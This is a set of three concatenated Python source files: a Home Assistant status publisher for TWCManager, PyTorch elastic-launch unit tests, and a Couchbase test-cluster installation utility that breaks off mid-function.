msg = self.msgQueue[msgKey]
if msg.elapsingTime < self.time.time():
self.sendingStatusToHASS(msg)
self.backgroundTasksLock.release()
def getSensorName(self, twcid, key_underscore):
return "sensor.twcmanager_" + str(self.getTwident(twcid)) + "_" + key_underscore
def setStatus(self, twcid, key_underscore, key_camelcase, value, unit):
self.backgroundTasksLock.acquire()
sensor = self.getSensorName(twcid, key_underscore)
if (sensor not in self.msgQueue) or (self.msgQueue[sensor].value != value):
self.msgQueue[sensor] = HASSMessage(
self.time.time(),
sensor,
twcid,
key_underscore,
key_camelcase,
value,
unit,
)
self.backgroundTasksLock.release()
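# Scheduling sketch (derived from this class): setStatus() keeps at most one
# queued message per sensor; background_task_thread() wakes every
# msgRateInSeconds and re-sends any message whose elapsingTime has passed.
# A successful send reschedules the message resendRateInSeconds ahead, a
# failed send retryRateInSeconds ahead.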
def sendingStatusToHASS(self, msg):
http = "http://" if not (self.useHttps) else "https://"
# serverPort may be an int (default 8123), so cast it before concatenating
url = http + self.serverIP + ":" + str(self.serverPort)
url = url + "/api/states/" + msg.sensor
headers = {
"Authorization": "Bearer " + self.apiKey,
"content-type": "application/json",
}
try:
self.master.debugLog(
8,
"HASSStatus",
f(
"Sending POST request to HomeAssistant for sensor {msg.sensor} (value {msg.value})."
),
)
devclass = ""
if str.upper(msg.unit) in ["W", "A", "V", "KWH"]:
devclass = "power"
if len(msg.unit) > 0:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"unit_of_measurement": msg.unit,
"device_class": devclass,
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase,
},
},
timeout=self.timeout,
headers=headers,
)
else:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase
},
},
timeout=self.timeout,
headers=headers,
)
# Setting elapsing time to now + resendRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.resendRateInSeconds
)
except self.requests.exceptions.ConnectionError as e:
self.master.debugLog(
4,
"HASSStatus",
"Error connecting to HomeAssistant to publish sensor values",
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
except self.requests.exceptions.ReadTimeout as e:
self.master.debugLog(
4,
"HASSStatus",
"Error connecting to HomeAssistant to publish sensor values",
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
except Exception as e:
self.master.debugLog(
4, "HASSStatus", "Error during publishing HomeAssistant sensor values"
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
def settingRetryRate(self, msg):
# Setting elapsing time to now + retryRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.retryRateInSeconds
)
class HASSMessage:
elapsingTime = 0
sensor = ""
twcid = ""
key_underscore = ""
key_camelcase = ""
value = None
unit = ""
def __init__(
self, elapsingTime, sensor, twcid, key_underscore, key_camelcase, value, unit
):
self.elapsingTime = elapsingTime
self.sensor = sensor
self.twcid = twcid
self.key_underscore = key_underscore
self.key_camelcase = key_camelcase
self.value = value
self.unit = unit
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import shutil
import subprocess
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.testing._internal.common_utils import (
TEST_WITH_ASAN,
TEST_WITH_TSAN,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
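# Example (illustrative PIDs): `pgrep -P 100` printing "101\n102" yields
# [101, 102]; an empty pgrep result yields [].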
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in list(os.environ.keys()):
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
"--use_env",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "fork"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails, the launcher raises an exception
to indicate that the worker process failed.
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertTrue(min_nodes, max_nodes)
self.assertTrue(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertTrue(2, min_nodes)
self.assertTrue(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
|
install_utils.py
|
import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
def __init__(self, name, url, path, product="cb"):
self.name = name
self.url = url
self.path = path
self.product = product
self.version = params["version"]
class NodeHelper:
def __init__(self, node):
self.node = node
self.ip = node.ip
self.params = params
self.build = None
self.queue = None
self.thread = None
self.rest = None
self.install_success = False
self.connect_ok = False
self.shell = None
self.info = None
self.enable_ipv6 = False
self.check_node_reachable()
self.nonroot = self.shell.nonroot
self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS
def check_node_reachable(self):
start_time = time.time()
# Retry for up to 60 seconds (roughly 3 attempts, 20s apart on failure)
while time.time() < start_time + 60:
try:
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
self.info = self.shell.extract_remote_info()
self.connect_ok = True
if self.connect_ok:
break
except Exception as e:
log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
time.sleep(20)
def get_os(self):
os = self.info.distribution_version.lower()
to_be_replaced = ['\n', ' ', 'gnu/linux']
for _ in to_be_replaced:
if _ in os:
os = os.replace(_, '')
if self.info.deliverable_type == "dmg":
major_version = os.split('.')
os = major_version[0] + '.' + major_version[1]
return os
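# Illustrative examples (values not from the original source): a distribution
# string like "CentOS 7\n" becomes "centos7"; for macOS dmg builds a version
# such as "10.15.7" is shortened to its major.minor form, "10.15".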
def uninstall_cb(self):
need_nonroot_relogin = False
if self.shell.nonroot:
self.node.ssh_username = "root"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
need_nonroot_relogin = True
if self.actions_dict[self.info.deliverable_type]["uninstall"]:
cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
if "msi" in cmd:
'''WINDOWS UNINSTALL'''
self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
self.shell.terminate_processes(self.info, \
[s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
installed_version, _ = self.shell.execute_command(
"cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
if len(installed_version) == 1:
installed_msi, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
0] + "*.msi")
if len(installed_msi) == 1:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
installed_msi[0]))
for browser in install_constants.WIN_BROWSERS:
self.shell.execute_command("taskkill /F /IM " + browser + " /T")
else:
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
if need_nonroot_relogin:
self.node.ssh_username = "nonroot"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
def pre_install_cb(self):
if self.actions_dict[self.info.deliverable_type]["pre_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
if cmd is not None:
if "HDIUTIL_DETACH_ATTACH" in cmd:
start_time = time.time()
while time.time() < start_time + timeout:
try:
ret = hdiutil_attach(self.shell, self.build.path)
if ret:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
else:
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
def set_vm_swappiness_and_thp(self):
# set vm.swappiness to 0 and THP (transparent huge pages) to never by default
# Check if this key is defined for this distribution/os
if "set_vm_swappiness_and_thp" in self.actions_dict[self.info.deliverable_type]:
try:
cmd = self.actions_dict[self.info.deliverable_type]["set_vm_swappiness_and_thp"]
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except Exception as e:
log.warning("Could not set vm swappiness/THP.Exception {0} occurred on {1} ".format(e, self.ip))
def install_cb(self):
self.pre_install_cb()
self.set_vm_swappiness_and_thp()
if self.actions_dict[self.info.deliverable_type]["install"]:
if "suse" in self.get_os():
cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
else:
cmd = self.actions_dict[self.info.deliverable_type]["install"]
cmd = cmd.replace("buildbinary", self.build.name)
cmd = cmd.replace("buildpath", self.build.path)
cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_install_cb()
def post_install_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
if self.actions_dict[self.info.deliverable_type]["post_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
else:
if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
if self.info.deliverable_type == "msi":
check_if_downgrade, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
"; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
"grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
print((check_if_downgrade * 10))
else:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["post_install_retry"],
debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def set_cbft_env_options(self, name, value, retries=3):
if self.get_os() in install_constants.LINUX_DISTROS:
while retries > 0:
if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
self.shell.stop_server()
self.shell.start_server()
time.sleep(10)
if ret == ['1']:
log.info("{0} set to {1} on {2}".format(name, value, self.ip))
break
else:
time.sleep(20)
retries -= 1
else:
print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))
def _get_cli_path(self):
if self.nonroot:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_NONROOT_CLI_PATH["WINDOWS_SERVER"]
else:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]
def _set_ip_version(self):
if params["enable_ipv6"]:
self.enable_ipv6 = True
if self.node.ip.startswith("["):
hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
else:
hostname = self.node.ip
cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
self.ip,
hostname,
self.node.rest_username,
self.node.rest_password)
else:
cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
self.ip,
self.node.rest_username,
self.node.rest_password)
self.shell.execute_command(cmd)
def pre_init_cb(self):
try:
self._set_ip_version()
if params["fts_query_limit"] > 0:
self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
except Exception as e:
log.warning("Exception {0} occurred during pre-init".format(e))
def post_init_cb(self):
# Optionally change node name and restart server
if params.get('use_domain_names', False):
RemoteUtilHelper.use_hostname_for_server_settings(self.node)
# Optionally disable consistency check
if params.get('disable_consistency', False):
self.rest.set_couchdb_option(section='couchdb',
option='consistency_check_ratio',
value='0.0')
def get_services(self):
if not self.node.services:
return ["kv"]
elif self.node.services:
return self.node.services.split(',')
def allocate_memory_quotas(self):
kv_quota = 0
info = self.rest.get_nodes_self()
start_time = time.time()
while time.time() < start_time + 30 and kv_quota == 0:
kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
time.sleep(1)
self.services = self.get_services()
if "index" in self.services:
log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
kv_quota -= testconstants.INDEX_QUOTA
if "fts" in self.services:
log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
kv_quota -= params["fts_quota"]
if "cbas" in self.services:
log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
kv_quota -= testconstants.CBAS_QUOTA
if "kv" in self.services:
if kv_quota < testconstants.MIN_KV_QUOTA:
log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
testconstants.MIN_KV_QUOTA,
self.ip))
kv_quota = testconstants.MIN_KV_QUOTA
log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)
def init_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
self.wait_for_completion(duration * 2, event)
start_time = time.time()
while time.time() < start_time + timeout:
try:
init_success = False
self.pre_init_cb()
self.rest = RestConnection(self.node)
# Make sure that data_path and index_path are writable by couchbase user
for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
for cmd in ("rm -rf {0}/*".format(path),
"chown -R couchbase:couchbase {0}".format(path)):
self.shell.execute_command(cmd)
self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
self.allocate_memory_quotas()
self.rest.init_node_services(hostname=None,
username=self.node.rest_username,
password=self.node.rest_password,
services=self.get_services())
if "index" in self.get_services():
if params["cb_edition"] == install_constants.CB_COMMUNITY:
params["storage_mode"] = "forestdb"
self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
self.rest.init_cluster(username=self.node.rest_username,
password=self.node.rest_password)
init_success = True
if init_success:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_init_cb()
def wait_for_completion(self, duration, event):
if params["debug_logs"]:
log.info(event.format(duration, self.ip))
time.sleep(duration)
def cleanup_cb(self):
cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
if cmd:
try:
# Delete all but the most recently accessed build binaries
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except:
#ok to ignore
pass
def _get_mounted_volumes(shell):
volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format("couchbase-server-"))
return volumes
def hdiutil_attach(shell, dmg_path):
volumes = _get_mounted_volumes(shell)
for volume in volumes:
shell.execute_command("hdiutil detach " + '"' + "/tmp/" + volume + '"')
shell.execute_command("umount " + '"' + "/tmp/" + volume + '"')
shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
format(dmg_path, "couchbase-server-" + params["version"]))
return shell.file_exists("/tmp/", "couchbase-server-" + params["version"])
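# Sketch of the macOS flow above: previously mounted /tmp/couchbase-server-*
# volumes are detached/unmounted first, the new dmg is then attached at
# /tmp/couchbase-server-<version>, and the function reports whether that
# mountpoint exists.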
def get_node_helper(ip):
for node_helper in NodeHelpers:
if node_helper.ip == ip:
return node_helper
return None
def print_result_and_exit(err=None, install_started=True):
if err:
log.error(err)
success = []
fail = []
install_not_started = []
for server in params["servers"]:
node = get_node_helper(server.ip)
if not node or not node.install_success:
if install_started:
fail.append(server.ip)
else:
install_not_started.append(server.ip)
elif node.install_success:
success.append(server.ip)
log.info("-" * 100)
for _ in install_not_started:
log.error("INSTALL NOT STARTED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in fail:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in success:
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
if len(fail) > 0 or len(install_not_started) > 0:
sys.exit(1)
def process_user_input():
params = _parse_user_input()
_params_validation()
return params
def _parse_user_input():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
print_result_and_exit(install_constants.USAGE)
if len(sys.argv) <= 1:
print_result_and_exit(install_constants.USAGE)
userinput = TestInput.TestInputParser.get_test_input(sys.argv)
except IndexError:
print_result_and_exit(install_constants.USAGE)
except getopt.GetoptError as err:
print_result_and_exit(str(err))
# Mandatory params
if not userinput.servers:
print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
else:
params["servers"] = userinput.servers
# Validate and extract remaining params
for key, value in list(userinput.test_params.items()):
if key == "debug_logs":
params["debug_logs"] = True if value.lower() == "true" else False
if key == "install_tasks":
tasks = []
for task in value.split('-'):
if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
tasks.append(task)
if len(tasks) > 0:
params["install_tasks"] = tasks
log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
return params # No other parameters needed
if key == 'v' or key == "version":
if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
params["version"] = value
if key == "url":
if value.startswith("http"):
params["url"] = value
else:
log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
if key == "type" or key == "edition":
if "community" in value.lower():
params["cb_edition"] = install_constants.CB_COMMUNITY
if key == "timeout" and int(value) > 60:
